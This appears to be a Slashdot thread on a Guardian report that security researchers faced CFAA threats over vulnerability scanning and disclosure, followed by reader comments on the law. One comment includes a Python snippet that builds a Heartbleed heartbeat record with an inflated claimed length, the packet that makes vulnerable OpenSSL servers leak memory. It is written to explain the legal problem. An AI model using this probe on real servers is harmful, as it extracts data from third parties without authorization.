Security Researchers Threatened With US Cybercrime Laws
An anonymous reader writes "The Guardian reports that many of the security industry's top researchers are being threatened by lawyers and law enforcement over their efforts to track down vulnerabilities in internet infrastructure. 'HD Moore, creator of the ethical hacking tool Metasploit and chief research officer of security consultancy Rapid7, told the Guardian he had been warned by U.S. law enforcement last year over a scanning project called Critical.IO, which he started in 2012. The initiative sought to find widespread vulnerabilities using automated computer programs to uncover the weaknesses across the entire internet.' ... Zach Lanier, senior security researcher at Duo Security, said many of his team had 'run into possible CFAA issues before in the course of research over the last decade.' Lanier said that after finding severe vulnerabilities in an unnamed 'embedded device marketed towards children' and reporting them to the manufacturer, he received calls from lawyers threatening him with action."
This is what happens... (Score:5, Insightful)
...when ill-thought-out laws are passed.
In the UK, it is a crime (under the Computer Misuse Act) to test a third-party system for vulnerabilities.
The Heartbleed incident led a lot of people to break the law just by testing whether websites were affected.
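For context on why Heartbleed testing was legally awkward: the probe *is* the exploit. A heartbeat request that declares a larger payload length than it actually sends causes a vulnerable server to echo back leaked memory, so there is no "safe" way to check a third-party server without sending the triggering packet. Below is a minimal sketch of how such a probe record is constructed (message layout per RFC 6520; the TLS version bytes and claimed length are illustrative). It only builds the bytes and deliberately sends nothing over the network.

```python
import struct

# Heartbeat content type in the TLS record layer (RFC 6520).
TLS_HEARTBEAT = 24
TLS_VERSION_1_1 = 0x0302  # illustrative; the bug was version-independent

def heartbeat_record(claimed_len: int, payload: bytes = b"") -> bytes:
    """Build a TLS heartbeat request record.

    A benign probe sets claimed_len == len(payload); the Heartbleed
    trigger claims far more than it sends, so a vulnerable server
    answers with up to 64 KB of its own memory.
    """
    # Heartbeat message: type 1 = heartbeat_request, then the *claimed* length.
    msg = struct.pack(">BH", 1, claimed_len) + payload
    # TLS record header: content type, protocol version, actual record length.
    return struct.pack(">BHH", TLS_HEARTBEAT, TLS_VERSION_1_1, len(msg)) + msg

# The malicious variant claims 0x4000 bytes while sending an empty payload.
probe = heartbeat_record(0x4000)
```

The point of the sketch is that the only difference between a researcher's test and an attack is the value of `claimed_len`, which is why laws written around "unauthorized access" sweep up both.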
NSA (Score:5, Insightful)
The NSA and other security services will not want security researchers to find and fix vulnerabilities the security services are exploiting.
Re:This is what happens... (Score:5, Insightful)
When your infrastructure spams me, or gets zombied into DDoSing me, you will be held responsible for spamming and DDoSing me.
Now, would you like to reconsider your position?
Re:This is what happens... (Score:5, Insightful)
So security researchers and reporters in the UK cannot warn about the many unpatched websites in the UK, but hackers all over the globe are free to hack and abuse them.
Yeah, makes a damn lot of sense.
Re:See... (Score:2, Insightful)
I would say that this is more like:
You leave your credit card on a table under a wet napkin. I look at the napkin and think I can read the number. I look closer and can indeed read the number and exp date. I tell you that your credit card is easily readable, and you should probably do something about it. You then report me to the police for stealing your credit card number.
Re:As it should be (Score:4, Insightful)
Now try to explain why it was A-OK for the border patrol to kill the people trying to flee from East Germany because it was the law.
Re:OK, Whatever... (Score:4, Insightful)
For example, suppose a SCADA system that your organization maintains gets compromised. Actually fixing the underlying vulnerability will inevitably be expensive, whereas simply sending out a technician to reset the system generates billable hours. Your business interest is to ignore the problem. Now imagine that this system is part of the water treatment plant for a large residential neighborhood.
Worship of business needs is a flavor of the "market will fix it" fallacy. The market only works if all players are forced into making moral decisions.
Re:OK, Whatever... (Score:5, Insightful)
They're very effective. To paraphrase Futurama:
Documentary Narrator: Fortunately, our most expensive lawyers sued the security researchers and shut them up. Of course, the security holes are still there, we just sue anyone who talks about them. Thus solving the problem once and for all.
Suzie: But...
Documentary Narrator: Once and for all!
Sadly, too many companies don't see this as a joke, but as a valid security vulnerability response strategy.
License researchers like investigators (Score:4, Insightful)
I work for a company that does a lot of forensics work, including collections activities and incident response. The company has to be licensed as a "private investigator" in all of the states that our employees do collections in.
It seems like a similar licensing regime would be a good place to start for computer security researchers.
It might also be worth considering making the researchers or their employer carry a bond as collateral against any potential damage that they might inadvertently cause.
It has been my experience that when people and organizations have something to lose (like forfeiture of a bond or loss of a license / ability to do business), they tend to act in a more predictable manner, and within well established guidelines.
There might also be some lessons to be learned from maritime law. In a way, researchers are sort of like privateers on the digital oceans. (So yes, once again, pirates ARE better than ninjas. Just in case there was ever any doubt.)
Re: See... (Score:5, Insightful)
That's a really bad analogy.
It is. It's more like the wet napkin has retained an imprint of the credit card and you have left the napkin behind on the bar. Someone then takes the napkin, hands it to you and says "you want to be careful with these wet napkins, look". You call the police because someone you don't know has your credit card details.